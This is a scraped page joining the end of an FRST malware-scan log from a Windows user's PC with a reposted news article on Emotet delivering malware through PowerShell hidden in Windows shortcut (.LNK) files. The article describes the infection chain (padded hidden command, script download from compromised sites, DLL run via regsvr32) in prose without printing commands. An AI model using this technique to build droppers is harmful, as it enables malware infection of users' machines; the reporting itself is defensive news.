2022-04-23 21:06 - 2022-01-19 22:01 - 000000000 ___RD C:UsersPhenomOneDrive
2022-04-23 12:19 - 2022-01-20 07:52 - 000002440 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsMicrosoft Edge.lnk
2022-04-23 02:14 - 2021-12-24 02:05 - 000000000 ____D C:TeamViewerPortable
2022-04-22 13:49 - 2022-01-19 22:53 - 143823848 ____C (Microsoft Corporation) C:WINDOWSsystem32MRT.exe
2022-04-22 13:46 - 2022-01-31 03:16 - 000000000 ____D C:Program Files (x86)Mozilla Maintenance Service
2022-04-21 22:20 - 2022-02-16 03:09 - 000000000 ____D C:Program FilesCheat Engine 7.4
2022-04-21 21:29 - 2022-03-24 01:37 - 007618600 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvapi64.dll
2022-04-21 21:29 - 2022-03-24 01:37 - 006465192 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvapi.dll
2022-04-21 18:11 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalLowMozilla
2022-04-21 18:07 - 2022-01-31 03:16 - 000000000 ____D C:ProgramDataMozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-04-21 18:06 - 2022-01-31 03:16 - 000001005 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsFirefox Nightly.lnk
2022-04-20 22:22 - 2022-01-19 22:02 - 000002302 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsGoogle Chrome Beta.lnk
2022-04-20 22:22 - 2022-01-19 22:02 - 000002261 _____ C:UsersPublicDesktopGoogle Chrome Beta.lnk
2022-04-20 17:21 - 2022-01-20 01:40 - 000005869 _____ C:UsersPhenomDownloadsfsecure_freedome_vpn_2.43.809.zip
2022-04-20 17:21 - 2022-01-19 22:18 - 000004742 _____ C:UsersPhenomDownloadsdrivermax_11.18.0.38.zip
2022-04-20 17:17 - 2022-01-19 22:18 - 000004651 _____ C:UsersPhenomDownloadsdriver_easy_5.6.14.33488.zip
2022-04-20 17:17 - 2022-01-19 22:18 - 000004651 _____ C:UsersPhenomDownloadsdriver_easy_5.6.14.33488 (1).zip
2022-04-20 17:13 - 2022-03-03 02:29 - 000005887 _____ C:UsersPhenomDownloadsfsecure_freedome_vpn_2.45.888 (1).zip
2022-04-20 04:13 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataRoamingGitHub Desktop
2022-04-20 01:15 - 2022-01-19 22:17 - 000000000 ____D C:UsersPhenomDocumentsGitHub
2022-04-19 23:42 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataRoamingNotepad++
2022-04-19 21:37 - 2022-01-31 16:56 - 000000000 ____D C:UsersPhenomAppDataLocalGitHubDesktop
2022-04-19 21:37 - 2022-01-19 22:17 - 000002378 _____ C:UsersPhenomDesktopGitHub Desktop.lnk
2022-04-15 14:19 - 2022-01-19 22:41 - 000000000 ____D C:ProgramDataSamsung
2022-04-13 23:59 - 2022-01-19 22:20 - 000294281 _____ C:UsersPhenomDownloadsSDI_Update.torrent
2022-04-13 18:54 - 2022-01-19 22:53 - 000000000 ____D C:WINDOWSsystem32MRT
2022-04-13 15:16 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalbabl-0.1
2022-04-12 23:13 - 2021-06-05 17:30 - 000000000 ___SD C:WINDOWSsystem32AppV
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSSysWOW64DiagSvcs
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64WinMetadata
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64vi-VN
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64oobe
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64lv-LV
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64lt-LT
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64id-ID
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64gl-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64eu-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64et-EE
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64es-MX
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64ca-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32WinMetadata
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32vi-VN
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32ShellExperiences
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32PerceptionSimulation
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32migwiz
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32lv-LV
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32lt-LT
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32id-ID
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32gl-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32eu-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32et-EE
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32es-MX
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32ca-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSShellExperiences
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSShellComponents
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSProvisioning
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSDiagTrack
2022-04-12 23:12 - 2021-06-05 17:30 - 000032768 _____ (Microsoft Corporation) C:WINDOWSsystem32OEMDefaultAssociations.dll
2022-04-12 23:12 - 2021-06-05 17:30 - 000021047 _____ C:WINDOWSsystem32OEMDefaultAssociations.xml
2022-04-12 19:04 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalgtk-2.0
2022-04-11 17:16 - 2022-01-31 20:37 - 000000000 ____D C:UsersPhenomAppDataLocalTeamViewer
2022-04-11 15:17 - 2022-01-31 22:03 - 000000000 __SHD C:UsersPhenomwc
2022-04-10 22:41 - 2022-02-26 17:48 - 000000000 ____D C:Program Files (x86)Twitch Recover
2022-04-10 00:54 - 2022-03-25 02:45 - 000000000 ____D C:Program FilesHWiNFO64
2022-04-09 17:46 - 2022-01-19 22:23 - 000000000 ____D C:ProgramDataPackage Cache
2022-04-09 01:50 - 2022-01-20 00:58 - 000000000 ____D C:Program FilesVideoLAN
2022-04-08 02:37 - 2022-01-20 07:52 - 000000000 ____D C:WINDOWSsystem32Driverswd
2022-04-06 21:52 - 2022-01-19 23:00 - 000000000 ____D C:Program FilesMicrosoft Update Health Tools
2022-04-06 15:17 - 2022-02-05 21:59 - 000000000 ____D C:Emoji
2022-03-31 21:57 - 2022-01-20 01:18 - 000000000 ____D C:UsersPhenom.android
2022-03-30 20:55 - 2022-01-19 22:30 - 002200272 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvspcap.dll
2022-03-30 20:54 - 2022-01-19 22:30 - 002859264 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvspcap64.dll
2022-03-30 20:54 - 2022-01-19 22:30 - 001295104 _____ (NVIDIA Corporation) C:WINDOWSsystem32NvRtmpStreamer64.dll

==================== Files in the root of some directories ========

2022-04-16 18:39 - 2022-04-22 16:56 - 000000149 _____ () C:UsersPubliclog.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Edited by buddy215, today, 1:12 p.m.

]]>
Emotet malware now installs via PowerShell in Windows shortcut files https://garagebandforwindowspc.org/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/ Tue, 26 Apr 2022 21:17:24 +0000 https://garagebandforwindowspc.org/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/ The Emotet botnet now uses Windows shortcut files (.LNK) containing PowerShell commands to infect victim computers, moving away from Microsoft Office macros which are now disabled by default. The use of .LNK files is nothing new, as the Emotet gang previously used them in combination with Visual Basic Script (VBS) code to create a command […]]]>

The Emotet botnet now uses Windows shortcut files (.LNK) containing PowerShell commands to infect victim computers, moving away from Microsoft Office macros which are now disabled by default.

The use of .LNK files is nothing new, as the Emotet gang previously used them in combination with Visual Basic Script (VBS) code to create a command that downloads the payload. However, this is the first time they have used Windows shortcuts to directly execute PowerShell commands.

New technique after a botched campaign

Last Friday, Emotet operators put an end to a phishing campaign because they botched their installer after using a static filename to reference the malicious .LNK shortcut.

Launching the shortcut would trigger a command that extracted a string of VBS code and added it to a VBS file to run.

However, since the distributed shortcut files had a different name than the static one they were looking for, creating the VBS file would fail. The gang fixed the problem yesterday.

Today, security researchers noticed that Emotet has moved to a new technique that uses PowerShell commands attached to the LNK file to download and run a script on the infected computer.

The malicious string added to the .LNK file is masked and padded with null values ​​(blank space) so that it does not display in the target field (the file the shortcut points to) of the properties dialog of the file.

Emotet using PowerShell in LNK files
source: BleepingComputer

Emotet’s malicious .LNK file includes the URLs of several compromised websites used to store the PowerShell script payload. If the script is present in one of the defined locations, it is downloaded to the system temporary folder as a PowerShell script with a random name.

Below is the deobfuscated version of the Emotet malicious string attached to the .LNK payload:

Malicious string of Emotet with PowerShell commands attached to LNK file
source: BleepingComputer

This script generates and launches another PowerShell script that downloads the Emotet malware from a list of compromised sites and saves it to the %Temp% folder. The downloaded DLL is then executed using the regsvr32.exe command.

The execution of the PowerShell script is done using the Regsvr32.exe command line utility and ends with the download and launch of the Emotet malware.

security researcher Max Malyutin indicates that in addition to using PowerShell in LNK files, this execution flow is new for deploying Emotet malware.

A booming new technique

Research group Cryptolaemus, which closely monitors Emotet activity, notes that the new technique is a clear attempt by the threat actor to circumvent defenses and automated detection.

Security researchers from cybersecurity firm ESET have also noticed that the use of the new Emotet technique has increased over the past 24 hours.

Telemetry data from ESET shows that the countries most affected by Emotet via the new technique are Mexico, Italy, Japan, Turkey and Canada.

Besides the switch to PowerShell in .LNK files, Emotet botnet operators have made a few other changes since resuming business at more stable levels in November, such as moving to 64-bit modules.

The malware is usually used as a gateway for other malware, especially ransomware threats like Conti.

]]>